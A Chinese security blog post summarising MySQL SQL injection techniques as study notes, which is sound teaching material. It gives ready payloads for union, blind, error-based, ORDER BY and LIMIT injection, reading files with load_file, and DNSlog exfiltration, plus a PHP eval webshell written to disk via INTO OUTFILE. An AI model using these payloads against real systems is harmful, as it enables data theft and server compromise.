<!DOCTYPE html><html lang="zh"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="Yumi"><title>sql注入小结 | phyb0x'Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = 'https://hm.baidu.com/hm.js?' + '407830c4543cf3fb1dd23c4a26528c03';
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
  })();
</script><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">sql注入小结</h1><a id="logo" href="/.">phyb0x'Blog</a><p class="description">智能安全初学者</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Start</i></a><a href="/archives/"><i class="fa fa-archive"> Archiv</i></a><a href="/about/"><i class="fa fa-user"> Über</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">sql注入小结</h1><div class="post-meta">2018-12-11<span> | </span><span class="category"><a href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">基础漏洞总结</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> Hits</span></span><span class="post-time"><span class="post-meta-item-text"> | </span><span class="post-meta-item-icon"><i class="fa fa-keyboard-o"></i><span class="post-count"> 2.1k</span><span class="post-meta-item-text"> Words</span></span></span><span class="post-time"> | <span class="post-meta-item-icon"><i class="fa fa-clock-o"></i><span class="post-count"> 8</span><span class="post-meta-item-text"> Minutes</span></span></span></div><a class="disqus-comment-count" href="/2018/12/11/sql%E6%B3%A8%E5%85%A5%E5%B0%8F%E7%BB%93/#vcomment"><span class="valine-comment-count" data-xid="/2018/12/11/sql%E6%B3%A8%E5%85%A5%E5%B0%8F%E7%BB%93/"></span><span> Comment</span></a><div class="post-content"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>基础漏洞学好研究明白才能更好的去学习审计。今天加了P神的圈子，代码审计和日战比当然是枯燥了些，希望自己能坚持下去。基础漏洞准备写个系<br>列，稍微深入研究下。</p>
<span id="more"></span>

<h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h3><p>总结了下觉得mysql注入主要分为如下几种方式。</p>
<h3 id="基础注入"><a href="#基础注入" class="headerlink" title="基础注入"></a>基础注入</h3><p>最简单的注入方式，一般是查询语句中没有对参数做过滤限制，导致绕过执行我们自己的查询语句并把直接显示到页面。</p>
<p>看网上一些文章去分析整型、字符型，当然这都无所谓。我们要思考的就是怎样执行我们的查询语句？</p>
<p>sqlmap中有这样一个参数。</p>
<pre><code>prefix=PREFIX 注入payload字符串前缀   --prefix=admin%1$&#39;
</code></pre>
<p>这参数的作用是绕过查询参数的闭合符号。</p>
<pre><code>$sql=&quot;SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1&quot;
</code></pre>
<p>以这条语句Less-1为例</p>
<p><img src="https://i.imgur.com/kR3FI3x.png"></p>
<p>可以看到没有报错并且执行了我们后插入的语句</p>
<pre><code>$sql=&quot;SELECT * FROM users WHERE id=&#39;-1&#39; union select 1,username,password from users where id=2 %23 # LIMIT 0,1&quot;
</code></pre>
<p>也就是说遇到这种注入我们要做的就是无论参数被什么符号闭合，找到它fuzz出它闭合它。</p>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>这个类型的注入我们这有根据页面的变化来逐字猜解我们要的信息。猜解正确回显正常，反之错误。</p>
<p>主要用到如下几种判断函数</p>
<h5 id="left"><a href="#left" class="headerlink" title="left"></a>left</h5><pre><code>left(a,b)从左侧截取a的前b位
</code></pre>
<h5 id="substr"><a href="#substr" class="headerlink" title="substr"></a>substr</h5><pre><code>substr(a,b,c)从b位置开始，截取字符串a的c长度。结合ascii()使用
</code></pre>
<h5 id="MID-ORD"><a href="#MID-ORD" class="headerlink" title="MID/ORD"></a>MID/ORD</h5><pre><code>mid(a,b,c)同substr
OPD()同ascii()
</code></pre>
<h5 id="regexp"><a href="#regexp" class="headerlink" title="regexp"></a>regexp</h5><pre><code>select user() regexp &#39;^[a-z]&#39;;
</code></pre>
<p><img src="https://i.imgur.com/lTBfYEN.png"></p>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>根据页面返回时间长短判断猜解是否正确。结合<code>if(condition,true,flase) / and 1=*</code>判断语句使用。</p>
<p>主要用到如下几种函数</p>
<h5 id="sleep"><a href="#sleep" class="headerlink" title="sleep"></a>sleep</h5><pre><code>sleep(N)  可以让语句运行N秒
</code></pre>
<h5 id="benchmark"><a href="#benchmark" class="headerlink" title="benchmark"></a>benchmark</h5><pre><code>benchmark() 可以测试某些特定操作的执行速度。参数可以是需要执行的次数和表达式。 

mysql&gt; select benchmark(10000000,MD5(&quot;hello word&quot;));
+---------------------------------------+
| benchmark(10000000,SHA1(&quot;hello word&quot;)) |
+---------------------------------------+
| 0 |
+---------------------------------------+
1 row in set (4.93 sec)
</code></pre>
<h5 id="get-lock"><a href="#get-lock" class="headerlink" title="get_lock"></a>get_lock</h5><pre><code>get_lock(key,timeout) 一个是key，就是根据这个参数进行加锁的，另一个是等待时间(s)。
如果key是第一次加锁返回1，反之等待时间进行第二次加锁。

利用条件比较苛刻，需要使用 mysql_pconnect函数来连接数据库
</code></pre>
<p>要两个session分别进行</p>
<p><img src="https://i.imgur.com/LYb3iii.png"></p>
<h5 id="RLIKE"><a href="#RLIKE" class="headerlink" title="RLIKE"></a>RLIKE</h5><p>通过rpad或repeat构造长字符串，加以计算量大的pattern，通过repeat的参数可以控制延时长短。</p>
<pre><code>rpad(str1,length,str2) str1没有length长用str2填充
repeat(str,count) 返回str重复count次之后的str
  
mysql&gt; select rpad(&#39;a&#39;,4999999,&#39;a&#39;) RLIKE concat(repeat(&#39;(a.*)+&#39;,30),&#39;b&#39;);
+-------------------------------------------------------------+
| rpad(&#39;a&#39;,4999999,&#39;a&#39;) RLIKE concat(repeat(&#39;(a.*)+&#39;,30),&#39;b&#39;) |
+-------------------------------------------------------------+
|   0 |
+-------------------------------------------------------------+
1 row in set (5.27 sec)
</code></pre>
<h5 id="笛卡尔积"><a href="#笛卡尔积" class="headerlink" title="笛卡尔积"></a>笛卡尔积</h5><p>概念自行百度吧，我现代60飘过。</p>
<p>本地测试两个表还可以，三个直接爆炸。(等不出来了估计是小时级的)</p>
<p><img src="https://i.imgur.com/eQTUCBT.png"></p>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><p>报错注入也是一种盲注，利用MYSQL函数特性返回信息，法师的代码审计后面有写到一共十个函数。</p>
<h5 id="floor"><a href="#floor" class="headerlink" title="floor"></a>floor</h5><pre><code>floor() 去除小数部分
rand() 产生随机数，如果限定种子rand(x)则随机数是固定的 
</code></pre>
<p>利用group by 和floor抛出主键冗余报错返回我们想要的信息。</p>
<pre><code>select count(*),concat(floor(rand(0)*2),(payload)) as x from information_schema.tables group by x;
</code></pre>
<h5 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue"></a>extractvalue</h5><pre><code>extractvalue(xml文档，xml路径) 对xml文档进行查询 查询的字符串最大长度32位，超出要结合substr
</code></pre>
<p>这个函数只要语法不错就不会报错会返回空。xml路径是/xx/x/ 这样的形式，我们只要写入非法格式就会报错。</p>
<pre><code>select username from security.user where id=1 and (extractvalue(&#39;anything&#39;,concat(&#39;~&#39;,(payload))))
</code></pre>
<h5 id="updatexml-同32位"><a href="#updatexml-同32位" class="headerlink" title="updatexml(同32位)"></a>updatexml(同32位)</h5><pre><code>updatexml(目标xml文档,xml路径,更新的内容) 更新xml文档的函数  原理用法同上给错误路径格式报错
</code></pre>
<h5 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h5><pre><code>exp()当传入的数值大于709时就会引起溢出错误(适用大于MySQL5.5.5)

select exp(~(select*from(payload)x))
</code></pre>
<h5 id="NAME-CONST"><a href="#NAME-CONST" class="headerlink" title="NAME_CONST"></a>NAME_CONST</h5><pre><code> and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
</code></pre>
<p>利用mysql列明重复会报错，适用低版本(貌似只能测试内置函数,我尝试写入payload报错网上也没有找到相应的实例)</p>
<h5 id="join"><a href="#join" class="headerlink" title="join"></a>join</h5><p>在已知表明的情况下适用</p>
<pre><code>select * from (select * from 表名 a join 表名 b) c)  
在得到一个字段后，使用using得到下一个字段
select * from (select * from 表名 a join 表名 b using (已知的字段,已知的字段)) c  
</code></pre>
<h5 id="几何函数"><a href="#几何函数" class="headerlink" title="几何函数"></a>几何函数</h5><pre><code>geometrycollection()，multipoint()，polygon()，multipolygon()，linestring()，multilinestring()
</code></pre>
<p>这些用法类似归结到一类，适用大于Mysql5.5.47，不包括5.7.17</p>
<pre><code>select linestring((select * from(select * from(payload)a)b));
</code></pre>
<h3 id="文件操作及增删改"><a href="#文件操作及增删改" class="headerlink" title="文件操作及增删改"></a>文件操作及增删改</h3><h4 id="load-file-导出文件"><a href="#load-file-导出文件" class="headerlink" title="load_file()导出文件"></a>load_file()导出文件</h4><p>使用条件</p>
<pre><code>1、有读写权限  and(select count(*) from mysql.user)&gt;0/* 返回正常说明有读写权限
2、知道绝对路径
3、读取文件在服务器上
4、读取文件要小于 max_allowed_packet
</code></pre>
<p>示例</p>
<pre><code>1、select 1,2,3,hex(replace(load_file(char(ascii编码的payload))))

2、select 1,2,3,load_file(char(ascii编码的payload))

3、select 1,2,3,load_file(hexpayload)

4、select 1,2,3,load_file(c:\\boot.ini)
</code></pre>
<h4 id="load-data-infile"><a href="#load-data-infile" class="headerlink" title="load data infile"></a>load data infile</h4><p>将文本中的数据写入到表中。</p>
<h4 id="outfile-文件导出"><a href="#outfile-文件导出" class="headerlink" title="outfile 文件导出"></a>outfile 文件导出</h4><pre><code>Select &lt;?php @eval($_post[“mima”])?&gt; into outfile “c:\\phpnow\\htdocs\\test.php” 
</code></pre>
<p>sql写马用的及时这种方式，要有读写权限。也可以结合load_file()使用。<br>    select load_ file(‘c:\wamp\bin\mysql\mysql5.6.17\my.ini’)into outfile‘c:\wamp\www\test.php</p>
<h3 id="常见注入"><a href="#常见注入" class="headerlink" title="常见注入"></a>常见注入</h3><h4 id="宽字节"><a href="#宽字节" class="headerlink" title="宽字节"></a>宽字节</h4><p>mysql使用GBK编码时认定两个字为一个汉字，在一些安全函数是这样(&#39;)转义单引号，我们可以%df%5c%27这样转义过来就变成<code>運&#39;</code>单引号逃逸。<br>再说一下这个一定要</p>
<pre><code>mysql_real_escape_string
mysql_set_charset 
</code></pre>
<p>一起使用，要不然还是会造成注入。</p>
<h4 id="order-by"><a href="#order-by" class="headerlink" title="order by"></a>order by</h4><p><code>order by</code>排序函数，经常被使用在猜解列名。order by注入不是利用这个函数去注入而是指注入点在order by后面。</p>
<pre><code>$sql = &quot;select * from users order by $sort&quot;
</code></pre>
<p>利用方式：</p>
<p>1、参数后直接跟注入语句 ?sort=(payload)</p>
<p><img src="https://i.imgur.com/Yo5m548.png"></p>
<p>2、?sort=1 and (payload)</p>
<p><img src="https://i.imgur.com/o5oPYIY.png"></p>
<p>3、利用布尔类型进行判断 不限于rand(true/false) 也可以利用if()等判断函数。</p>
<pre><code>/?sort=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00))
</code></pre>
<h4 id="limit"><a href="#limit" class="headerlink" title="limit"></a>limit</h4><p>limit注入其实和order by 分不开。看p牛博客<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html">https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html</a></p>
<pre><code>SELECT field FROM table WHERE id &gt; 0 ORDER BY id LIMIT injection_point
</code></pre>
<p>limit后面可以跟两个函数<code>PROCEDURE 和 INTO</code>，INTO要有写入权限，可以用报错和时间盲注直接上payload</p>
<p>报错注入</p>
<pre><code>SELECT field FROM user WHERE id &gt;0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 
</code></pre>
<p>时间盲注(sleep不行)</p>
<pre><code>SELECT field FROM table WHERE id &gt; 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
</code></pre>
<h4 id="无逗号注入"><a href="#无逗号注入" class="headerlink" title="无逗号注入"></a>无逗号注入</h4><p>忘了是在哪到ctf题目里面get到的，以为不重要，但是某位老哥面试的时候被问到了。还是记录下，直接上payload。</p>
<pre><code>&#39; union select * from (payload) a join (select version() ) b %23
</code></pre>
<h4 id="DNSlog注入"><a href="#DNSlog注入" class="headerlink" title="DNSlog注入"></a>DNSlog注入</h4><p>将select查询到的数据与一个域名拼接成一个新的子域名，然后请求解析这个子域名，利用dns解析产生的记录日志来查看数据。</p>
<h5 id="Ceye"><a href="#Ceye" class="headerlink" title="Ceye"></a>Ceye</h5><p>CEYE<a target="_blank" rel="noopener" href="http://ceye.io/">http://ceye.io</a>是一个检测带外流量的监控平台，如DNS查询和HTTP请求。注册之后会分配一个二级域名<code>：xxx.ceye.io</code>，我们把注入信息放到三级域名。</p>
<p>因为要用load_file()解析DNS请求，所以mysql <code>secure_file_priv</code>的值不能为NULL。这个配置在phpmyadmin日志文件getshell里也有用到。</p>
<p><img src="https://i.imgur.com/TsAXIGM.png"></p>
<p><img src="https://i.imgur.com/tKP7Ktj.png"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>sql基础基本就这样了，主要是要灵活利用。总结了一些报错盲注函数，遇到waf的时候可以都试试，后续尝试写一些bypass的，可能是只研究sqlbypass，也可能等基础漏洞写完之后一起研究下。(估计很有难度)</p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/175049.html">https://www.freebuf.com/articles/web/175049.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cdxy.me/?p=789">https://www.cdxy.me/?p=789</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/253">https://xz.aliyun.com/t/253</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/afanti/p/8047530.html">https://www.cnblogs.com/afanti/p/8047530.html</a></p>
</div><div id="donate"><link rel="stylesheet" type="text/css" href="/css/donate.css"><script type="text/javascript" src="/js/donate.js" successtext="Copy Successed!"></script><a class="pos-f tr3" id="github" target="_blank" rel="noopener" href="https://github.com/Kaiyuan/donate-page" arget="_blank" title="Github"></a><div id="DonateText">Donate</div><ul class="list pos-f" id="donateBox"><li id="AliPay" qr="/img/airpy.png"></li></ul><div class="pos-f left-100" id="QRBox"><div id="MainBox"></div></div></div><div class="tags"></div><div class="post-nav"><a class="pre" href="/2018/12/21/win%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">win权限维持</a><a class="next" href="/2018/12/06/php%E5%AE%A1%E8%AE%A1%E7%AC%94%E8%AE%B0/">php审计笔记</a></div><div id="vcomment"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script><script>var notify = 'false' == 'true' ? true : false;
var verify = 'false' == 'true' ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'MhBSauY8QdXDPd9mzDsCmUQ8-gzGzoHsz',
  appKey:'BwJxec1eCc5PCTXUcPKUHRl0',
  placeholder:'我就只是想看看，字都懒得打...',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10'
})
</script></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Kategorien</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">基础漏洞总结</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/">机器学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%84%9A%E6%9C%AC%E5%B7%A5%E5%85%B7/">脚本工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%BF%90%E7%BB%B4/">运维</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Letzte</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/08/05/%E7%89%B9%E5%BE%81%E5%B7%A5%E7%A8%8B/">特征工程</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/20/%E8%BF%87Waf/">sql绕安全狗</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/17/weblogic%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%B1%87%E6%80%BB/">weblogic漏洞利用汇总</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/14/jsonp%E5%AE%89%E5%85%A8/">jsonp安全</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/29/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ew%E5%A4%9A%E7%BA%A7%E8%BD%AC%E5%8F%91/">ew多级转发</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ARP%E6%AC%BA%E9%AA%97/">ARP欺骗</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/25/SSRF%E6%B5%85%E6%9E%90/">SSRF浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/23/xxe%E6%B5%85%E6%9E%90/">xxe浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/21/win%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">win权限维持</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Blogroll</i></div><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">phyb0x'Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="Copy Successed!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>